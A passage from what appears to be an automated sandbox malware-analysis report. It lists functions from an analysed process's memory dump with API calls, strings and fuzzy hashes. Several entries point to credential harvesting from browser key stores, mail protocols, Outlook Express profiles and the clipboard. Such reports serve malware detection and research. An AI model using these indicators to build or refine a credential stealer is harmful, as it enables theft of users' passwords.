                                                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                              • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                            • String ID: ACD
                                                                            • API String ID: 82305771-620537770
                                                                            • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                            • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                            • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                            • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                            Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004091EC
                                                                            • sprintf.MSVCRT ref: 00409201
                                                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                            • String ID: caption$dialog_%d
                                                                            • API String ID: 2923679083-4161923789
                                                                            • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                            • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                            Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                            • memset.MSVCRT ref: 00410246
                                                                            • memset.MSVCRT ref: 00410258
                                                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                            • memset.MSVCRT ref: 0041033F
                                                                            • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                            • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                            • String ID:
                                                                            • API String ID: 3974772901-0
                                                                            • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                            • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                            • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                            • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                            Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcslen.MSVCRT ref: 0044406C
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                            • strlen.MSVCRT ref: 004440D1
                                                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                            • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                            • String ID:
                                                                            • API String ID: 577244452-0
                                                                            • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                            • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                            Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                            • _strcmpi.MSVCRT ref: 00404518
                                                                            • _strcmpi.MSVCRT ref: 00404536
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi$memcpystrlen
                                                                            • String ID: imap$pop3$smtp
                                                                            • API String ID: 2025310588-821077329
                                                                            • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                            • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                            • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                            • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                            Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C02D
                                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                            • API String ID: 2726666094-3614832568
                                                                            • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                            • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                            Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                              • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                            • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                            • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                            • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp$memcpy
                                                                            • String ID: global-salt$password-check
                                                                            • API String ID: 231171946-3927197501
                                                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                            Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                            • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                            • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                            • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                            Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040644F
                                                                            • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                            • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                              • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                              • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                            • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                            • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                            • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                            • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                              • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID:
                                                                            • API String ID: 438689982-0
                                                                            • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                            • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                            • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                            • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                            Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                            • memset.MSVCRT ref: 0040330B
                                                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                            • strchr.MSVCRT ref: 0040335A
                                                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                            • strlen.MSVCRT ref: 0040339C
                                                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                            • String ID: Personalities
                                                                            • API String ID: 2103853322-4287407858
                                                                            • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                            • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                            • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                            • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                            Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: winRead
                                                                            • API String ID: 1297977491-2759563040
                                                                            • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                            • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                            • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                            • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                            Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0044955B
                                                                            • memset.MSVCRT ref: 0044956B
                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: gj
                                                                            • API String ID: 1297977491-4203073231
                                                                            • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                            • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                            • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                            • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                            Function 0040C143 Relevance: 7.6, APIs: 5, Instructions: 54clipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                            • String ID:
                                                                            • API String ID: 1189762176-0
                                                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                            Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 004090C2
                                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                            • String ID:
                                                                            • API String ID: 4247780290-0
                                                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                            Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _strcmpi.MSVCRT ref: 0040E134
                                                                            • _strcmpi.MSVCRT ref: 0040E14D
                                                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi$_mbscpy
                                                                            • String ID: smtp
                                                                            • API String ID: 2625860049-60245459
                                                                            • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                            • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                            Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C28C
                                                                            • SetFocus.USER32(?,?), ref: 0040C314
                                                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FocusMessagePostmemset
                                                                            • String ID: S_@$l
                                                                            • API String ID: 3436799508-4018740455
                                                                            • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                            • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                            Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004092C0
                                                                            • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                            • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                            Strings
                                                                            • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString_mbscpymemset
                                                                            • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                            • API String ID: 408644273-3424043681
                                                                            • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                            • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                            • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                            • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                            Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy
                                                                            • String ID: C^@$X$ini
                                                                            • API String ID: 714388716-917056472
                                                                            • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                            • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                            • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                            • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                            Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
